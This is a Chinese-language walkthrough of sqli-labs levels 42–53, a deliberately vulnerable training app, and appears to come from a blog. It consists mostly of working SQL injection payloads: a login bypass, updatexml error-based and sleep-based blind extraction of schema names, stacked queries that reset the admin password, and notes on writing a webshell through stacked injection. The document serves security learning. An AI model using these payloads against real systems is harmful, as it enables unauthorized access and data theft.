sqllabs(第42-53)

第42关

万能密钥登录成功

密码: 'or 1=1 -- aaa

修改密码中尝试报错注入

# 获取数据库名

'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

# 获取数据表名

'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

# 获取字段名

'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

';update security.users set password='1111' where username='admin' -- aaa

尝试修改密码-成功拿到权限

第43关

')or 1=1-- aaa 密码,登陆成功。

获取数据库名

') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

获取数据表名

') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

获取字段名

') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

#尝试修改admin密码

');update security.users set password='1234' where username='admin' -- aaa

第44关

无回显布尔盲注,单引号闭合方式

获取数据库长度

'or length(database())=8 -- a

一步一步获取数据库具体名字,第一个字母s,ascii值为115

'or ascii(substr(database(),1,1))=115-- aaa

一步一步获取数据表名字,第一个字母为e,ascii值为101

'or ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=101 -- aaa

一步一步获取数据表字段名字,,第一个字母为e,ascii值为105

'or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105 -- aaa

#尝试修改admin密码

');update security.users set password='1234' where username='admin' -- aaa

第45关

闭合使用的****')**** ,SQL盲注根据是否成功登录判断信息。

获取数据库长度

'or length(database())=8 -- a

一步一步获取数据库具体名字,第一个字母s,ascii值为115

'or ascii(substr(database(),1,1))=115-- aaa

一步一步获取数据表名字,第一个字母为e,ascii值为101

'or ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=101 -- aaa

一步一步获取数据表字段名字,,第一个字母为e,ascii值为105

'or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105 -- aaa

#尝试修改admin密码

');update security.users set password='1234' where username='admin' -- aaa

第46关

获取数据库名

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

获取数据表名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1)

获取字段名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1)

第47关

单引号闭合其他与46一样

获取数据库名

'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

获取数据表名

'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

获取字段名

'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

第48关

无回显时间盲注+数字型

猜数据库名的长度

?sort=1 and if(length(database())>1,sleep(5),1)

猜数据库名

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(5),1)

猜数据表名

?sort=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1)

猜数据字段名

?sort=1 and if((ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)

第49关

无回显时间盲注+单引号闭合

猜数据库名的长度

?sort=1' and if(length(database())>1,sleep(5),1) -- aaa

猜数据库名

?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) -- aaa

猜数据表名

?sort=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- aaa

猜数据字段名

?sort=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- aaa

第50关

数字型+报错注入

获取数据库名

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

获取数据表名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1)

获取字段名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1)

此题源码中出现的mysqli_multi_query(执行一个或多个针对数据库的查询。多个查询用分号进行分隔。)

知道网站绝对路劲:堆叠注入+写入文件

Mysql.ini配置文件添加

mysqld

secure_file_priv=""

写入文件成功了

第51关

字符型+报错注入+单引号闭合

获取数据库名

?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

获取数据表名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1)

获取字段名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1)

可以堆叠注入+写小马

第52关

无回显时间盲注+数字型注入

And if 判断

猜数据库长度

and if(length(database())=8,sleep(5),1)

猜数据库的组成字母

and if(ascii(substr(database(),1,1))=115,sleep(5),1)

猜数据表的组成字母

and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1)

猜数据表的字段组成字母

and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1))=105,sleep(5),1)

第53关

无回显时间盲注+字符型注入+单引号闭合

猜数据库长度

?sort=1' and if(length(database())=8,sleep(5),1) -- aaa

猜数据库的组成字母

?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) -- aaa

猜数据表的组成字母

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) -- aaa

猜数据表的字段组成字母

?sort=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1))=105,sleep(5),1)-- aaa

相关推荐
apihz6 分钟前
域名WHOIS信息查询免费API使用指南
android·开发语言·数据库·网络协议·tcp/ip
gwcgwcjava12 分钟前
[时序数据库-iotdb]时序数据库iotdb的安装部署
数据库·时序数据库·iotdb
SHUIPING_YANG26 分钟前
根据用户id自动切换表查询
java·服务器·数据库
爱吃烤鸡翅的酸菜鱼39 分钟前
IDEA高效开发:Database Navigator插件安装与核心使用指南
java·开发语言·数据库·编辑器·intellij-idea·database
超奇电子43 分钟前
阿里云OSS预签名URL上传与临时凭证上传的技术对比分析
数据库·阿里云·云计算
modelmd1 小时前
mysql not in 查询引发的bug问题记录
sql·mysql
神仙别闹1 小时前
基于C#+SQL Server实现(Web)学生选课管理系统
前端·数据库·c#
枷锁—sha1 小时前
【DVWA系列】——CSRF——Medium详细教程
android·服务器·前端·web安全·网络安全·csrf
枷锁—sha1 小时前
跨站请求伪造漏洞(CSRF)详解
运维·服务器·前端·web安全·网络安全·csrf
m0_653031361 小时前
PostgreSQL技术大讲堂 - 第97讲:PG数据库编码和区域(locale)答疑解惑
数据库·postgresql